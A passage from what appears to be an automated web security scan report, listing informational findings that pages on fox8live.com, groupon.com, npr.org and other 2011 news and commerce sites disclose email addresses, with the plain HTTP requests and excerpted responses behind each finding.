<a href="/mediacenter/local.aspx?videoid=23143@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23110@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24358@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24339@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24271@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.8. http://www.fox8live.com/content/news/seregni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24684@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24555@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24448@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24345@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24040@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23722@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23605@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23493@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23383@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23170@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23080@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22994@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22648@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22450@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22027@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21931@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21347@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=20307@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=20210@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=19471@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=18710@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=18495@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=17745@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=17173@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=16999@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=16363@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=15744@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=14707@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13689@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13345@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13282@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=12969@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=12346@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=11971@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="mailto:TechGuru8@gmail.com">
...[SNIP]...

20.9. http://www.fox8live.com/content/news/watercooler/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.10. http://www.fox8live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24757@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24743@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24752@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24703@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24704@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24677@wvue.web.entriq.net&amp;navCatId=771">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24657@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24542@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24532@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24759@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24757@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24756@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24755@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24754@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24750@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24746@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24752@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24747@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24687@wvue.web.entriq.net&navCatId=792">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24557@wvue.web.entriq.net&navCatId=792">
...[SNIP]...

20.11. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoId=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.12. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Issue detail

The following email address was disclosed in the response:

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoId=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.13. http://www.fox8live.com/wireless/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.14. http://www.groupon.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<p>Your friend may contact us at support@groupon.com to request that we remove this information from our database.</p>
...[SNIP]...
able Information you provide us. You may change any of your Personally Identifiable Information by logging into your account and accessing the "my account" section of the site, sending us an email at support@groupon.com or writing to us at 600 West Chicago Avenue, Suite 620, Chicago, Illinois 60654. Please indicate your name, address and email address, and what information you would like to update when you contact us
...[SNIP]...
of our Advertisers and Affiliates. If you do not want to receive Promotional Emails from us, you may elect to opt-out of receiving Promotional Emails at any time after registering by e-mailing us at support@groupon.com, by writing to us at the address contained herein, or by hitting the ...unsubscribe... button at the bottom of any of our e-mails. When contacting us, please indicate your name, address, email addres
...[SNIP]...
<a href="mailto:support@groupon.com">support@groupon.com</a>
...[SNIP]...

20.15. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following email address was disclosed in the response:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<input class="prompting_field focused grid_5 input" id="session_email_address" name="session[email_address]" size="30" title="you@domain.com" type="text" />
...[SNIP]...

20.16. http://www.macroaxis.com/widgets/url.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
<b>Configuration Error: Contact us support@macroaxis.com to resolve this issue</b>
...[SNIP]...

20.17. http://www.natchezdemocrat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.natchezdemocrat.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124195861.1304954844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=124195861.1072315151.1304954844.1304954844.1304954844.1; __utmc=124195861; __utmb=124195861.1.10.1304954844

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Last-Modified: Mon, 09 May 2011 15:36:27 GMT
Vary: Accept-Encoding,Cookie
Expires: Mon, 09 May 2011 16:36:27 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Etag: 9f7d4ebf4b1f290977c44ce93671a199
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 57842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta
...[SNIP]...
<a href="mailto:newsroom@natchezdemocrat.com">
...[SNIP]...

20.18. http://www.npr.org/templates/javascript/generated/regPage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/javascript/generated/regPage.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/javascript/generated/regPage.js HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:56:57 GMT
Server: Apache/2.2.14 (Unix)
Accept-Ranges: bytes
Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:06:57 GMT
Last-Modified: Wed, 27 Apr 2011 14:45:18 GMT
Keep-Alive: timeout=10, max=4930
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding, User-Agent
Content-Length: 175362


(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||
...[SNIP]...
.hav()+q+(qs?qs:s."
